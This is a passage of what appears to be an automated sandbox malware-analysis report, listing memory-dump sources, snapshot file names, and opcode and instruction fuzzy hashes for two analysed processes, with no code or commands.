                                                            • Opcode Fuzzy Hash: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction Fuzzy Hash: 62E01A6254F7C44FCB16EB74886A9447FA0EE6731078B40EEC089CF1B3E62D9849C701
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db8d82aa4fd912582ab4b7ed5b1fe79fabc3275a32ae0ad90e8adfbf59dc8445
                                                            • Instruction ID: 72e3761972c78c95f93e47f2d6a6e9056a5ddd80193cc26c807724c85f231aab
                                                            • Opcode Fuzzy Hash: db8d82aa4fd912582ab4b7ed5b1fe79fabc3275a32ae0ad90e8adfbf59dc8445
                                                            • Instruction Fuzzy Hash: E752D731B1991E4FEBA8EB5884A56B973D2FFA8310F0506B9D05EC32E6DE747D818740
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e81b1bfcf7e478eb143973275a724013d5ea7a144c378852985ae683a01627d
                                                            • Instruction ID: e7bb64c530fc34bf9b66b5f7b3dd4997dd09b81b6ba2d3fa1d961cc03b9d322e
                                                            • Opcode Fuzzy Hash: 2e81b1bfcf7e478eb143973275a724013d5ea7a144c378852985ae683a01627d
                                                            • Instruction Fuzzy Hash: E732C631B1DA4E4BE768EB5884A16B973A2FFA8310F0546B9D05EC31E7DE34BD818741
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0c7038266e4d8dd090944d9964a832c3ef78c28c17f7a8cacb349f6f0e95793f
                                                            • Instruction Fuzzy Hash: 6BE0122060EBC84FC70E963948695507FB1EB6B11178A52DBC445CB2F3D919DD89C752
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c8c43ae8548a6c8baf8326c278fbc20efb516a3154ad84e821ecf5d8c31b4677
                                                            • Instruction ID: 707e91758471bbe3ea6e68ad489dd34d96fcd526dcf3b7d64acd146258b62881
                                                            • Opcode Fuzzy Hash: c8c43ae8548a6c8baf8326c278fbc20efb516a3154ad84e821ecf5d8c31b4677
                                                            • Instruction Fuzzy Hash: 91F06D6151E3C40FC3129B3888654547FB0EA2B20534B05FBC0CACB5B3D91A888B8302
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction ID: e805c711bc528ae03d3625db703375292f0be2a9ee213c4554534b6a955966ce
                                                            • Opcode Fuzzy Hash: c9e126082e6e7d33fbdadeee630665ee9f0c59e8dd31bd30ae80c8bef0500291
                                                            • Instruction Fuzzy Hash: ACF03025B0D41F4BE769EB8494A06B932D5FB94300F15427ED41BD31F6ED68A9128640
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 446c6698018bd0aadcd082627104667de6e52e29fbd767b9c9c0287d0e2fe7c3
                                                            • Instruction ID: 6775719ba2f3a3f281a63fb639520fd0c01e09f134ad3780dedecd889a2359cc
                                                            • Opcode Fuzzy Hash: 446c6698018bd0aadcd082627104667de6e52e29fbd767b9c9c0287d0e2fe7c3
                                                            • Instruction Fuzzy Hash: 89E03061F1A81E5FE6B0BB8880643B812D1EB6CB10F4A4172C40ED32A1DDB86D014385
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4ea42b2bb606dda0b010934ce95ebc77e2adcc2d4a1b94e97b6914bb1a7df75e
                                                            • Instruction ID: 27af88a063b7ef7b7908f24d13ab54287fcd58814ffefc222166b941b50f7023
                                                            • Opcode Fuzzy Hash: 4ea42b2bb606dda0b010934ce95ebc77e2adcc2d4a1b94e97b6914bb1a7df75e
                                                            • Instruction Fuzzy Hash: 09F01D30E1951E8BEB58EB84D864ABD72A1FF54314F01063ED416D7299DBB466008A40
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 243261e8d1098a7afa7f2707c5edd33ad9c3c86006d615b9f063650293f623f5
                                                            • Instruction ID: b4c6266c8e48bd59eff9bc684a75c1199843e97fa6419dd1c7c22ad235104e6d
                                                            • Opcode Fuzzy Hash: 243261e8d1098a7afa7f2707c5edd33ad9c3c86006d615b9f063650293f623f5
                                                            • Instruction Fuzzy Hash: 7BE09A21F1AC2D5FE6B4FB4C80293BC22D2EBAC710F460176C00EC32A2DDB82E424785
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 189b01c8f967fc67d0d10a0456a0b976cd0d14527ff1d71b1a547067b1ecba70
                                                            • Instruction ID: f2a3258953b762ae58eeede28478c615e965742f5f2cd6ba5ad0035f71aa32ce
                                                            • Opcode Fuzzy Hash: 189b01c8f967fc67d0d10a0456a0b976cd0d14527ff1d71b1a547067b1ecba70
                                                            • Instruction Fuzzy Hash: 72F0B430B0D64E8EE768EB64C4906BD77E0AF54711F14417AD009C32E6DA786680CA44
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb6921dbeb3ce898b881a1b1af141a6eb40599e2aa10bed43c4a01d136d6323e
                                                            • Instruction ID: 6fea124b7c2609e1e42c561a800961a4925cc51ef64ca45e406bcd8b121d0402
                                                            • Opcode Fuzzy Hash: eb6921dbeb3ce898b881a1b1af141a6eb40599e2aa10bed43c4a01d136d6323e
                                                            • Instruction Fuzzy Hash: 59E0927160E3C44FCB16EA3488688557FA0EF6B21174A41EEC046CF2A7EA2DCC85CB11
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fbfbd30a557effa5a1f4c238effb533736f487951f6ae0ca9abc9833238a0df1
                                                            • Instruction ID: b71520877707e7fa63769699bcf1acb03c740b69a6d2746f4f4d68533352fe04
                                                            • Opcode Fuzzy Hash: fbfbd30a557effa5a1f4c238effb533736f487951f6ae0ca9abc9833238a0df1
                                                            • Instruction Fuzzy Hash: 96E09271A4A3C44FCB16AA348868454BFA0EF6720174A52FEC046CF2A7EA2DC886C701
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f4a6cb9737d9705ba08b95aee8fa6837228f1318e145d83829f04bd12107763
                                                            • Instruction ID: 6192a1bc619b3b02a9734998f9c0a23a7882829bc4534538c425b854e3975304
                                                            • Opcode Fuzzy Hash: 0f4a6cb9737d9705ba08b95aee8fa6837228f1318e145d83829f04bd12107763
                                                            • Instruction Fuzzy Hash: 0EE02621B5D85906EBBCB67468B25B17280DB89334B0506B9D01AC62DACC595CC14281
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 344c34409fb12aaf9034b2d540c0cb5abf031cfedf5ad41746b943d0d6c8cb70
                                                            • Instruction ID: e1df41ce4b3ebec57643cc7a9a76b473b854f5c112f0923f8b53f51e08b914da
                                                            • Opcode Fuzzy Hash: 344c34409fb12aaf9034b2d540c0cb5abf031cfedf5ad41746b943d0d6c8cb70
                                                            • Instruction Fuzzy Hash: 20E0927164E3C08FCB16EB3484688547F60EE6720174A42EEC446CF2A7EA2DC886C711
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d78b74fcd8fa0f2c37ab9e8f5d2d9e8a45a0f452e6b07ba804f7464576df84ed
                                                            • Instruction ID: 850c768f288621bfd64b4b998a71f9faa643c16fe62cd97174e2669ab70bbcdb
                                                            • Opcode Fuzzy Hash: d78b74fcd8fa0f2c37ab9e8f5d2d9e8a45a0f452e6b07ba804f7464576df84ed
                                                            • Instruction Fuzzy Hash: E9E04F21A0A7C44FC70A97388C699503FB0EE6B21178F00DBD045CB5F3E519DC48C712
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 810936c5e8ec2e624f269aeac36d93d12a5a9a43f4435756d123705e48987b8a
                                                            • Instruction ID: dbaf4e7869f09bf42f8ced414a81183fb2e2f24bd9e46ea1c1f6fd5120822f39
                                                            • Opcode Fuzzy Hash: 810936c5e8ec2e624f269aeac36d93d12a5a9a43f4435756d123705e48987b8a
                                                            • Instruction Fuzzy Hash: 4FE01A7154E3C44FCB06AB7488658553FA09E6B21078B40EEC185CF1B3E62D8949C701
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction ID: 5076f2f3662c58d76b691443f69e215c777f5f1ace16fe46c5ebec0fcdc110a3
                                                            • Opcode Fuzzy Hash: 7a910977822b8c92c576265edb5b32a01c18198aee3000b557f60e55b00c8074
                                                            • Instruction Fuzzy Hash: EFE04F3270EC0E8AF771A75888645BE3252ABD0322B164335C01EC31E5DEACEB068681
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c86fded1930a1f603ba335a5ee18e657c5ad2e83db752248d3747d970606636
                                                            • Instruction ID: 9713601686de56f99d46f056a9ef4fae23ddfa95840f0701623eac1a27ef7273
                                                            • Opcode Fuzzy Hash: 1c86fded1930a1f603ba335a5ee18e657c5ad2e83db752248d3747d970606636
                                                            • Instruction Fuzzy Hash: C9E04F2154F3C44FC70B973088788503F609E1721074A41EAC145CF2B3E9298C49C712
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bae3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0aa733bbe95b4f402a5168598b0d167bf7600790ef9767f2e70ad8ed3d05f3af
                                                            • Instruction ID: a3c1f2b569e3ae8eb1933fa5ff41021ed2e9bd8d8dddacb3314d1d4897e574de
                                                            • Opcode Fuzzy Hash: 0aa733bbe95b4f402a5168598b0d167bf7600790ef9767f2e70ad8ed3d05f3af
                                                            • Instruction Fuzzy Hash: 57E01A7154A3C04FCB06AB7488A99443FB0AE6B21078E41DEC04ACF1B3E62D8949C701
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 41fe43c65c7414e98c21418380f3e6dc5b9a020a0dc282fe106c742bab5957b8
                                                            • Instruction ID: c8c378fc38d94044646397e189844600d946c0dd9b4a1e22f3f1b4ad89a0aebe
                                                            • Opcode Fuzzy Hash: 41fe43c65c7414e98c21418380f3e6dc5b9a020a0dc282fe106c742bab5957b8
                                                            • Instruction Fuzzy Hash: ABE0177190A7884FC74A9B3488A99803FB0EE6B21178B01C7D045CF5B3EA5D8D89C752
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d31fa697f5e44a0111269a3430acab1cb1bcd2aacb62210cce70f3a499f91b1f
                                                            • Instruction ID: d32185705cd2da419cb85299d93dd1da11d3d7e2c48b8f2930a3cde888bebab2
                                                            • Opcode Fuzzy Hash: d31fa697f5e44a0111269a3430acab1cb1bcd2aacb62210cce70f3a499f91b1f
                                                            • Instruction Fuzzy Hash: AFE04F2154F3C04FC70B973088B88547F60DE2B21038A40EEC145CF2B3E5298D49C702
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction ID: 65aec5663ad2742d356b1a54043c2dd432b3c2062ecb00ab5a9225a1fa98eef4
                                                            • Opcode Fuzzy Hash: d3fa799343420fc2f7fb740c623fb9b4f5aab2b078573fd9b9dceea2072441a2
                                                            • Instruction Fuzzy Hash: 6AE04F2154E3C44FC70B973088788503F609E2721078A41EEC145CF2B3E6298849C702
                                                            Memory Dump Source
                                                            • Instruction ID: 55fdb63b9008d460a4d9902cd6b10540827652113c681a0da6b0002013a1fde3
                                                            • Opcode Fuzzy Hash: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction Fuzzy Hash: 62E01A6254F7C44FCB16EB74886A9447FA0EE6731078B40EEC089CF1B3E62D9849C701
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 419d73e4f0db3c69c36e037a23c3e37c85bd1c666780556710ca44d3810b2ad1
                                                            • Instruction ID: 9f5a38964d947251907f955e35b98defe30ac25f2743536ac655806161067172
                                                            • Opcode Fuzzy Hash: 419d73e4f0db3c69c36e037a23c3e37c85bd1c666780556710ca44d3810b2ad1
                                                            • Instruction Fuzzy Hash: F352B531B1D91D4FEB68FB6888A56B87392FFA8310F0146B9D05DC32A7DE786D818741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01486ff5fed635d99f1a3b88620ff216d258fb2a4082a044382835266001da59
                                                            • Instruction ID: afa7360e84af59866fc763e8c8c9c0f503af633ef97e95e861cbdd790703f304
                                                            • Opcode Fuzzy Hash: 01486ff5fed635d99f1a3b88620ff216d258fb2a4082a044382835266001da59
                                                            • Instruction Fuzzy Hash: 5132D531B1D94A4BE768FB6888A56B47392FFA8310F0146B9D05EC31E7DE78BD818741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05ffab55964c6a44abc5c1946cec2cf54341044cbe28ec91767d576eb73d8340
                                                            • Instruction ID: a814e54d6f3d567f4b9f44469c4a07f9ea1a4dad3404438d006d180e7676e810
                                                            • Opcode Fuzzy Hash: 05ffab55964c6a44abc5c1946cec2cf54341044cbe28ec91767d576eb73d8340
                                                            • Instruction Fuzzy Hash: 5002B371B1D90D4BE768FB6C88A567873A2EFA8310F014679D05EC72E7DE78AD428740
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7268bc581e097da849be8d193e3390b0cfb8b02f8d9beffc03978de2f7de455
                                                            • Instruction ID: 1b1e8f5e015c688a8520e161f849533bf8e7646f3f963ba8cfbd03977bd978f4
                                                            • Opcode Fuzzy Hash: c7268bc581e097da849be8d193e3390b0cfb8b02f8d9beffc03978de2f7de455
                                                            • Instruction Fuzzy Hash: E8F19571B1D90E4FE768FB5888A567873A2FFA8310F014679D05EC72A7DE78AD428740
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25e51366c63ff33dadbd78a33fb33c897ac8e87618ac0fdb29911964e38f3e84
                                                            • Instruction ID: 1898bf13a3bf781639f5f003f27c4113f00fd3a2f600f0babd33e3dd0053f4d2
                                                            • Opcode Fuzzy Hash: 25e51366c63ff33dadbd78a33fb33c897ac8e87618ac0fdb29911964e38f3e84
                                                            • Instruction Fuzzy Hash: 42910621B1DB4E0FEBACEB5888B66B976C2EFA8354F048179E40DC72D7DD686D454380
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db00a41cc0bffb6f32b6e5fd93f92ab016a8e32560a71931c6802e9bedfc15b2
                                                            • Instruction ID: b0a8cc7832f8c6c221e6733a7469255ce05b1d5db4dd10dda18e562750a87d81
                                                            • Opcode Fuzzy Hash: db00a41cc0bffb6f32b6e5fd93f92ab016a8e32560a71931c6802e9bedfc15b2
                                                            • Instruction Fuzzy Hash: 5C61B430B19A194FDB58FB68C4A9ABD73A2FF98314F514179E00EC72D6CF38A8428741
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bbc11e9b2b5b36f7f35a07790e893703174f550de82c34751bc96cec2d7ec5f
                                                            • Instruction ID: d0e45cad16f8b277dc7cc5060758769ea0f01f7e23d5fcb96bd907477fd452c2
                                                            • Opcode Fuzzy Hash: 7bbc11e9b2b5b36f7f35a07790e893703174f550de82c34751bc96cec2d7ec5f
                                                            • Instruction Fuzzy Hash: 52419330B1890D4FDB54EF6DC458AA973E1FFA8314F51427AE01DC72E6CB39A9418790
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 558bbc89375f9d52af678927ec95eb094c78eec687bed20acd2b81206710fc6e
                                                            • Instruction ID: 23fb5d31c748dc1d8d733297489b756d4e5677a2e4e37ba40cdce30c2b43bac2
                                                            • Opcode Fuzzy Hash: 558bbc89375f9d52af678927ec95eb094c78eec687bed20acd2b81206710fc6e
                                                            • Instruction Fuzzy Hash: 4E414812B0D5590FE718FBBCA4A96F87781DF5933AB0446BBE44ECB1E7CD18A8418285
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3d668aab34f53ef8d12a9b051c49132909b8928b2c47796f8ea1390a1cafaff
                                                            • Instruction ID: e607301d5cfb61670bef96d852e80358040c1b0ab6f7070c1587ac48189e35fe
                                                            • Opcode Fuzzy Hash: f3d668aab34f53ef8d12a9b051c49132909b8928b2c47796f8ea1390a1cafaff
                                                            • Instruction Fuzzy Hash: B531E421B19A4E4FE7E4E79C48AA6F47EE1EF68350F4541B6E00DC31E6DD78A9014341
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccddfc5e53e39d7e1a93e4f42d89ed24c73481f5a7c4f7daa152e20df6e488b0
                                                            • Instruction ID: 4925c770ff88f44cc1009f2f0b2c87ea39a250c40bd30d7a0b48a63b25a2c3d1
